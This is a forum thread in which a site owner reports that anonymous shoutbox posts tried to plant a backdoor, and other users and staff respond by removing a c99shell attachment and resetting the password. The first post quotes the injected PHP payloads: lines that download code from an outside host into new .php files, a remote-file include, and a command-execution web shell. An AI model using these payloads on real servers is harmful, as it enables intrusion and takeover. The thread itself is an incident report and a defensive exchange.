possible hack?

[vTech]

hey, i'm a lil worried...I have a shoutbox on my site http://asri-z.net/index.php
some anonymous poster made some post like

[COLOR="Red"]meeeee:[/COLOR] <?php $z=fopen("b.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
[COLOR="Red"]lucs:[/COLOR] <?php $z=fopen("z.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>
[COLOR="Red"]sdf:[/COLOR] <?php include $_GET["include"]; ?>
[COLOR="Red"]sdf:[/COLOR] <?php system($_GET["cmd"]); ?>
[COLOR="Red"]Nameq:[/COLOR] <?php $z=fopen("a.php",'w');fwrite($z,file_get_contents("http://faevs.com/z.txt"));fclose($z); ?>

and i see a mysterious file on my shoutbox folder...
I've attached it,it's quite big....
what i'm worried is,when i checked the source of the file,i see something like

Owned by Spyn3t

please advice...dun want anything bad to happen....
thank you...

 

[sunils]

I have removed the attachement with the previous post as it contain a trojan horse backdoor.c99shell. i have reported this thread to the admin also. they will take care of the problem once they come online.

 

[vTech]

one good way to catch this idiot would find anyone link to the site /************Link removed because its also a trojan **********/ cos that's where the source came from....

 

[Russ]

I have looked into this, and also checked your files to ensure that it didn't execute. I am going to change your password as a precaution, and email you a new one. It appears, however, your shoutbox was alittle more secure than to allow it to execute. Thank you for reporting this to us. Your password has been sent to 'asri.znet@yahoo.com'.

 

[Corey]

Remove the shoutbox, the script is insecure, it will happen again.

 

[vTech]

aight,script will be removed....